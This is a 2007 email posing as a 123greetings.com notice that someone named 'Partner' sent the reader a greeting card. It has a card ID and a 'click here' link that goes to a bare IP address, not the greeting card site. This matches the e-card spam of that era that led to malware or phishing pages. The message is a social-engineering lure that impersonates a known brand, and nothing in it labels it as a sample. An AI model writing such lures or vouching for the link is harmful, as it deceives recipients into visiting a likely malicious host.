Subject: Partner sent you a greeting card from 123greetings.com!

From: "123greetings.com" <[email-masked]>
Date: Fri, 10 Aug 2007 12:15:06 -0500

Partner has created a greeting card for you at 123greetings.com,
the Internet's most popular greeting card service. 

Your greeting card ID is: b516c3c2cd8a7c0b58e47d14c775ed217 

To see your custom greeting card, simply click on the link below: 
http://98.196.127.60/?b516c3c2cd8a7c0b58e47d14c775ed217

Send greeting cards from 123greetings.com whenever you want by visiting us at: 
http://123greetings.com/
Copyright (c) 1996-2007 123greetings.com All Rights Reserved